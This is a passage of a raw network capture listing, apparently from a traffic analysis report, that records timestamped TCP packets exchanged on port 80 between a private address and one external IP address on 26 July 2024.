                                  Jul 26, 2024 23:14:28.778834105 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.778868914 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.779042959 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779053926 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779067039 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779088974 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.779328108 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779366970 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.779469013 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779479980 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779490948 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779503107 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779510021 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.779525042 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.779580116 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.780113935 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780127048 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780136108 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780149937 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.780157089 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780165911 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780178070 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.780183077 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780191898 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780210018 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.780215025 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780225039 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780240059 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780250072 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.780263901 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.780951977 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780963898 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780975103 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780983925 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.780992031 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.780999899 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781007051 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.781017065 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781024933 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781042099 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781045914 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.781054974 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781061888 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.781073093 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781088114 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.781838894 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781848907 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781863928 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781872034 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.781881094 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781893969 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.781913042 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781920910 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781935930 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781944990 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781951904 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.781961918 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781970978 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.781987906 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.782046080 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.782804012 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.782815933 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.782826900 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.782835007 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.782875061 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.849805117 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.849817991 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.849838018 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850033998 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.850087881 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850100040 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850116014 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850125074 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.850136995 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850151062 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.850550890 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850559950 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850574017 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850581884 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.850594997 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850605011 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850615978 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.850625992 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.850636959 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.851134062 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.851141930 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.851159096 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.851169109 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.851176023 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.851187944 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.851195097 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.851206064 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.851214886 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.851229906 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.851257086 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.852125883 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.852135897 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.852147102 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.852161884 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.852170944 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.852188110 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.852190971 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.852200985 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.852216959 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.852224112 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.852276087 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.853033066 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853044033 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853054047 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853068113 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853076935 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.853085041 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853094101 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853106022 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853111982 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.853122950 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853131056 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853146076 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.853179932 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.853879929 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853889942 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853903055 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853910923 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.853919983 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853929043 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.853944063 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.853996038 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.854418039 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.854427099 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.854441881 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.854449987 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.854466915 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.854482889 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.854494095 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.854507923 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.854516983 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.854526043 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.854551077 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.855264902 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.855273962 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.855287075 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.855302095 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.855320930 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.855326891 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.855340004 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.855357885 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.855396986 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.864214897 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.864228010 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.864249945 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.864269972 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.864453077 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.864461899 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.864480019 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.864494085 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.864514112 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.864521980 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.865798950 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.865843058 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.865859032 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.865868092 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.865921974 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.866065979 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866210938 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866223097 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866241932 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.866478920 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866489887 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866502047 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866509914 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.866520882 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866534948 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.866944075 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866952896 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866966009 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.866977930 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.866986036 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867017031 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.867362022 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867372036 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867388010 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867397070 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867403984 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.867441893 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.867886066 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867896080 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867909908 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867918968 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.867932081 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867940903 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867950916 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.867959023 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867968082 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.867984056 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.868010998 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.868860006 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.868870020 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.868881941 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.868899107 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.868906975 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.868917942 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.868926048 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.868935108 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.868951082 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.868953943 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.868973017 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.869002104 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.869739056 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.869748116 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.869760036 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.869774103 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.869786024 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.869793892 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.869805098 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.869813919 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.869827032 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.869832993 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.869849920 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.869874001 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.870882034 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.870892048 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.870903969 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.870919943 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.870930910 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.870935917 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.870949984 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.870958090 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.870964050 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.871000051 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.937634945 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.937648058 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.937653065 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.937674999 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.937683105 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.937686920 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.937691927 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.937906027 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.938086033 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.938138008 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.938185930 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.938251972 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.938260078 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.938288927 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.938474894 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.938484907 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.938503027 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.938512087 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.938519955 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.938560009 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.938998938 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939008951 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939027071 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939037085 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939043999 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.939055920 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939069986 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.939096928 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.939601898 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939610004 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939626932 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939635992 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939642906 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.939654112 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939662933 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939671993 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.939682961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.939698935 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.940551996 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940560102 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940576077 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940584898 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940594912 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.940603971 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940613031 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940627098 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.940632105 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940640926 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940649033 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.940658092 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.940675020 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.940702915 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.941458941 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.941469908 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.941481113 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.941493988 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.941507101 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.941514015 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.941524982 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.941531897 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.941540956 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.941565037 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.942128897 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942177057 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.942305088 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942312002 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942369938 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.942384958 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942394972 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942425013 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.942706108 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942714930 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942730904 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942739964 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942748070 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.942760944 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.942794085 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.943228960 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.943238020 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.943270922 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.943434954 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.943443060 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.943458080 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.943471909 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.943500996 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.952889919 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.952903032 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.952923059 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.952955961 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.953110933 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.953119993 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.953136921 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.953146935 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.953155041 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.953180075 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.954293013 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954338074 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.954356909 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954366922 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954406023 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.954523087 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954583883 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954593897 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954607964 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954617023 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.954624891 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954642057 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.954929113 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.954978943 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.954994917 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.955005884 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.955046892 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.955270052 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.955279112 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.955296040 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.955305099 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.955312014 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:28.955321074 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:28.955344915 CEST4974180192.168.2.451.77.140.74
